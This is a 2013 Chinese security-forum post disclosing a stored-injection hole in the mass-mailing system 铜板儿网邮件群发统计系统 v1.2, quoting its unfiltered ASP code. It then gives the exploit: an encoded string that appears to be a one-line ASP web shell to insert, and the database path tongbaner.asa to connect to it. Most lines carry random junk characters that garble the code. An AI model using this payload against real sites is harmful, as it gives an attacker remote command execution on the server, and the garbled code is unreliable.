找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2033|回复: 0
打印 上一主题 下一主题

铜板儿网邮件群发统计系统 v1.2 漏洞

[复制链接]
跳转到指定楼层
楼主
发表于 2013-3-14 20:14:57 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
'Fenlei.asp
; Y  g' a/ n2 z( h# c( q5 L7 ^. b
IF Request.QueryString("Action")="del" Then
6 v3 O+ {, k. L+ @ID=Request.QueryString("ID") 9 z7 y) C% }+ c/ j0 n
IF Countss ("tui","Fenlei",ID )<>0 then
  L. T6 K+ ~- y( W'略
" D# c9 ?9 m, y% _IF Request.QueryString("Action")="Add" Then
1 N- c! a# \/ }' O- j' vTname=Request.Form("Typename")
: Y% o- D  b" a) F  uSet Rs=Server.CreateObject("adodb.Recordset")
' P9 D  e0 C0 Z! f# oSql="Select * From Fenlei Order by id Desc "
% h% D+ `( Y# Y$ DRs.Open Sql,Conn,1,3
: [# {0 N8 G# sRs.Addnew 1 `. j' E: F1 h5 S- |
Rs("Typename")=Tname 9 K& x% T# ^% d1 G
'略
" g/ U5 V* @0 n- P! YSet Rs=Server.CreateObject("adodb.Recordset") 1 p. k; W  \# X- N: p# D
Sql="Select * From Fenlei Order by id Desc "
2 x- Y* e; V# b! C, {3 f1 Y& `Rs.Open Sql,Conn,1,1
+ I: F2 [2 O# M1 U6 X" R3 W! ^7 g; f'略
  M1 @" `  U1 O% @1 A/ \& S% k- m( k%>! i& ]1 O- t2 X3 u: t7 @& y7 L
, p% Z8 `+ O; t$ w

. c4 w) s" H% A: y/ W4 @
: r3 P% M% j: y5 g8 V( c+ r; l% U没有过滤,直接写入数据库。& q% a8 |" @" h  L( {; r" [- k

: J( e  b# H5 y( J& d% u利用方法:
2 f8 S& }& Z+ j% g: h) f
5 P$ b$ ~( C% O% e插入:┼攠數畣整爠煥敵瑳∨≡┩>2 t' R; H) l, @6 W2 T; F8 X. w9 u
  l+ z7 k3 f$ [6 W7 |# _6 i

, k6 G; `. n2 L. n+ u# }连接: http://www.xxx.com/###tongbaner.asa . w2 K- y3 o9 C& l0 w9 S
'默认安装文件: 9 a! e) B$ `0 _* p
'install.asp9 |5 B+ E0 ~; m3 Z4 x: {( s; V
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表